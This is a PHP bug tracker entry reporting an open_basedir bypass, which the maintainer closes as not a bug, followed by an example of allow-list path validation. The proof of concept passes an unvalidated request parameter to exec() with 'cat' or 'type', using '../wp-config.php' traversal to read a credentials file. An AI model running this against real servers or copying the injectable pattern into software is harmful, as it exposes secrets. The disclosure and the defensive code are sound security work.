Sec Bug #81715 Apache + PHP <= 8.1.4 open_basedir bypass
Submitted: 2022-04-06 19:14 UTC Modified: 2022-04-07 09:46 UTC
From: phpforwork at gmail dot com Assigned: cmb (profile)
Status: Not a bug Package: *Directory/Filesystem functions
PHP Version: 8.1.4 OS: Linux/Windows
Private report: No CVE-ID: None

 [2022-04-06 19:14 UTC] phpforwork at gmail dot com
Description:
------------
Description:
=============
The open_basedir security feature can be bypassed to read a file outside the open_basedir path.


Proof of Concept
================
0. The target file you want to read: C:/xampp/htdocs/wp-config.php
1. Set open_basedir as a security feature in php.ini file :
open_basedir = C:/xampp/htdocs/test
2. Make a PHP script, "bypass.php" inside folder *test* :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("type ".$dir->getRealPath()." > result.txt"));
?>
for Linux webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("cat ".$dir->getRealPath()." > result.txt"));
?>
3. Call the script :
curl localhost/test/bypass.php?file=../wp-config.php
4. You will see the full content of the file here : result.txt

Tested with PHP 5.6.3 and 7.x. and 8.x.
=====================

Reported by : Saleh 0xHunter ( twitter.com/0xhunter )

Test script:
---------------
For Windows webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("type ".$dir->getRealPath()." > result.txt"));
?>
for Linux webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("cat ".$dir->getRealPath()." > result.txt"));
?>


 [2022-04-07 09:46 UTC] cmb@php.net
-Status: Open +Status: Not a bug -Assigned To: +Assigned To: cmb
 [2022-04-07 09:46 UTC] cmb@php.net
From the PHP manual[1]:

| open_basedir is just an extra safety net, that is in no way
| comprehensive, and can therefore not be relied upon when security
| is needed.

Consequently, our security classification[2] doesn't regard
open_basedir bypasses as security issues.

External programs just don't know about open_basedir.  For several
reasons, user input that is passed to any of the program execution
functions needs to be thoroughly validated by the userland script;
in this case you want to introduce some allow-list and verify that
the supplied path is in that list, and otherwise reject the
request.

[1] <https://www.php.net/manual/en/ini.core.php#ini.open-basedir>
[2] <https://wiki.php.net/security>
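
The allow-list validation recommended in the reply above, as an added example that is not part of the report or of the maintainer's comment. The helper name resolveAllowedFile, the file names and the temporary demo directory are assumptions constructed for illustration.

```php
<?php
declare(strict_types=1);

/**
 * Map a user-supplied key to a vetted absolute path, or null to reject.
 * $allowed maps request keys to file names relative to $baseDir.
 * (Hypothetical helper, not part of PHP or of the report.)
 */
function resolveAllowedFile(string $key, string $baseDir, array $allowed): ?string
{
    // Allow-list check: the request selects an entry, it never supplies a path.
    if (!isset($allowed[$key])) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$key]);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // Containment check on the canonical path, so a symlink or "../" in an
    // allow-list entry cannot lead outside the base directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed demo data: a temporary base directory with one permitted file,
// and one file outside it standing in for a sensitive configuration file.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'obd_demo_' . getmypid();
$base = $root . DIRECTORY_SEPARATOR . 'test';
is_dir($base) || mkdir($base, 0700, true);
file_put_contents($base . DIRECTORY_SEPARATOR . 'readme.txt', "public text\n");
file_put_contents($root . DIRECTORY_SEPARATOR . 'secret.php', "<?php // outside\n");

// 'bad-entry' is a deliberately misconfigured allow-list value.
$allowed = ['readme' => 'readme.txt', 'bad-entry' => '../secret.php'];

foreach (['readme', '../secret.php', 'bad-entry', 'missing'] as $key) {
    $path = resolveAllowedFile($key, $base, $allowed);
    if ($path === null) {
        echo "$key: rejected\n";
        continue;
    }
    // Read with a PHP filesystem function, which open_basedir does apply to,
    // instead of handing the path to an external program via exec().
    echo "$key: " . file_get_contents($path);
}
```

Only the "readme" key is served; the raw traversal string, the misconfigured entry and the unknown key are all rejected before any file is opened.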
 